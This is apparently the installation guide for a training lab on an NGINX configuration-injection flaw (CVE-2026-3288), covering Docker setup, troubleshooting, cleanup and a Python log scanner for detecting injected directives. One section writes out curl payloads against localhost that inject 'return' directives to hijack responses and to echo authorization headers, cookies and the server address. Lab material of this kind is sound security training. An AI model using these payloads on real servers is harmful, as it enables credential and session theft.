# CVE-2026-3288 Lab - Installation Guide

## Quick Installation

### Prerequisites Check

```bash
# Check Docker
docker --version
# Required: Docker 20.10+

# Check Docker Compose
docker-compose --version
# Required: Docker Compose 1.29+

# Check Python
python3 --version
# Required: Python 3.6+

# Check curl
curl --version
```

### Step-by-Step Installation

#### 1. Navigate to Lab Directory

```bash
cd CVE-2026-3288-lab
```

#### 2. Make Scripts Executable

```bash
chmod +x exploits/*.sh
chmod +x exploits/*.py
chmod +x detection/*.sh
chmod +x cleanup/*.sh
```

#### 3. Start the Lab

```bash
# Start all containers
docker-compose up -d

# Check status
docker-compose ps
```

Expected output:

```
NAME                      STATUS
cve-2026-3288-backend     Up
cve-2026-3288-nginx       Up
cve-2026-3288-monitor     Up
```

#### 4. Verify Installation

```bash
# Test backend
curl http://localhost:8080/

# Test NGINX
curl http://localhost/

# Test health endpoint
curl http://localhost/health
```

#### 5. View Logs

```bash
# All logs
docker-compose logs

# NGINX logs only
docker-compose logs nginx

# Follow logs
docker-compose logs -f
```

## Running Exploits

### Automated Exploitation

```bash
cd exploits

# Install Python requirements
pip3 install requests

# Run all exploits
python3 exploit.py --all

# Run specific exploit
python3 exploit.py --hijack
python3 exploit.py --creds
python3 exploit.py --redirect
```

### Manual Exploitation

```bash
cd exploits

# Make executable
chmod +x test-exploits.sh

# Run manual tests
bash test-exploits.sh
```

### Individual Exploit Examples

```bash
# Response hijacking
curl 'http://localhost/api" return 200 "HACKED'

# Credential theft
curl -H "Authorization: Bearer secret" \
  'http://localhost/login" return 200 "Token: $http_authorization'

# Cookie theft
curl -H "Cookie: session=abc123" \
  'http://localhost/" return 200 "Cookies: $http_cookie'

# Internal IP leak
curl 'http://localhost/" return 200 "IP: $server_addr'
```

## Monitoring and Detection

### Start Log Monitoring

```bash
cd detection

# Make executable
chmod +x monitor-logs.sh

# Start monitoring
bash monitor-logs.sh
```

### Manual Log Inspection

```bash
# View access logs
docker-compose logs nginx | grep -E 'return|rewrite'

# View error logs
docker-compose logs nginx | grep ERROR

# Export logs
docker-compose logs nginx > nginx-logs.txt
```

## Troubleshooting

### Port Already in Use

```bash
# Check what's using port 80
sudo lsof -i :80

# Option 1: Stop conflicting service
sudo systemctl stop apache2  # or nginx

# Option 2: Change port in docker-compose.yml
# Edit ports section: "8080:80" instead of "80:80"
```

### Containers Won't Start

```bash
# Check Docker daemon
sudo systemctl status docker

# View detailed logs
docker-compose logs

# Rebuild containers
docker-compose down
docker-compose build --no-cache
docker-compose up -d
```

### NGINX Configuration Errors

```bash
# Test NGINX config
docker exec cve-2026-3288-nginx nginx -t

# View config
docker exec cve-2026-3288-nginx cat /etc/nginx/nginx.conf

# Restart NGINX
docker-compose restart nginx
```

### Backend Not Responding

```bash
# Check backend logs
docker-compose logs backend

# Test backend directly
docker exec cve-2026-3288-backend curl http://localhost:5000/

# Restart backend
docker-compose restart backend
```

### Python Script Errors

```bash
# Install missing dependencies
pip3 install requests

# Run with verbose output
python3 exploit.py --all -v

# Check Python version
python3 --version  # Should be 3.6+
```

## Cleanup

### Stop Lab

```bash
# Stop containers
docker-compose stop

# Stop and remove containers
docker-compose down

# Remove containers and volumes
docker-compose down -v
```

### Complete Cleanup

```bash
cd cleanup

# Make executable
chmod +x cleanup.sh

# Run cleanup script
bash cleanup.sh
```

### Manual Cleanup

```bash
# Remove containers
docker-compose down -v

# Remove images
docker rmi cve-2026-3288-lab_nginx
docker rmi cve-2026-3288-lab_backend

# Remove volumes
docker volume prune

# Remove networks
docker network prune
```

## Verification Checklist

- [ ] Docker and Docker Compose installed
- [ ] Lab containers running (`docker-compose ps`)
- [ ] NGINX responding on port 80
- [ ] Backend responding on port 8080
- [ ] Exploit scripts executable
- [ ] Python requests library installed
- [ ] Can run automated exploits
- [ ] Can run manual exploits
- [ ] Log monitoring working

## Next Steps

After successful installation:

1. Read the main [README.md](README.md) for vulnerability details
2. Review [payloads.txt](exploits/payloads.txt) for exploit examples
3. Run automated exploits: `python3 exploits/exploit.py --all`
4. Try manual exploitation: `bash exploits/test-exploits.sh`
5. Monitor logs: `bash detection/monitor-logs.sh`

## Support

If you encounter issues:

1. Check the Troubleshooting section above
2. Review Docker logs: `docker-compose logs`
3. Verify prerequisites are met
4. Ensure no port conflicts
5. Try rebuilding: `docker-compose build --no-cache`

---

**For authorized security training only**
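
A more precise version of the `grep -E 'return|rewrite'` check from Manual Log Inspection, as an added example that is not one of the lab's own scripts: it decodes each request line and flags a double quote followed by a directive name, or the NGINX variables used in the payloads in this guide. It assumes the NGINX `combined` log format with default escaping (a literal `"` is logged as `\x22`); the sample log lines are constructed.

```python
import re
from urllib.parse import unquote

# Assumed log layout: NGINX "combined" format with default escaping, where a
# literal double quote in the request line is written as \x22.
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(.*?)" (\d{3}) ')
HEX_ESCAPE = re.compile(r'\\x([0-9A-Fa-f]{2})')
# A quote that closes the current config token, followed by a directive name.
DIRECTIVE = re.compile(r'"\s*(return|rewrite)\b', re.IGNORECASE)
# NGINX variables that appear in this guide's payloads.
VARIABLE = re.compile(r'\$(http_[a-z0-9_]+|server_addr)\b', re.IGNORECASE)


def normalise(request):
    """Undo NGINX \\xNN log escaping, then percent-encoding."""
    unescaped = HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), request)
    return unquote(unescaped)


def scan(lines):
    """Return one finding per log line whose request carries injected config."""
    findings = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not an access-log line (e.g. error log or banner)
        client, request, status = m.group(1), normalise(m.group(2)), int(m.group(3))
        reasons = ["directive:" + d.lower() for d in DIRECTIVE.findall(request)]
        reasons += ["variable:$" + v.lower() for v in VARIABLE.findall(request)]
        if reasons:
            findings.append({"client": client, "status": status,
                             "request": request, "reasons": reasons})
    return findings


# Constructed sample lines (not captured from the lab).
SAMPLE_LOG = r'''
172.18.0.1 - - [10/Mar/2026:10:00:01 +0000] "GET /health HTTP/1.1" 200 2 "-" "curl/8.5.0"
172.18.0.1 - - [10/Mar/2026:10:00:05 +0000] "GET /api\x22 return 200 \x22HACKED HTTP/1.1" 200 6 "-" "curl/8.5.0"
172.18.0.1 - - [10/Mar/2026:10:00:09 +0000] "GET /login%22%20return%20200%20%22Token:%20$http_authorization HTTP/1.1" 200 20 "-" "curl/8.5.0"
172.18.0.1 - - [10/Mar/2026:10:00:12 +0000] "GET /docs/return-policy HTTP/1.1" 200 512 "-" "curl/8.5.0"
'''.strip().splitlines()

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["client"], f["status"], ",".join(f["reasons"]), f["request"])
```

The `/docs/return-policy` line matches the plain `grep` but is not flagged here, because no quote precedes the keyword.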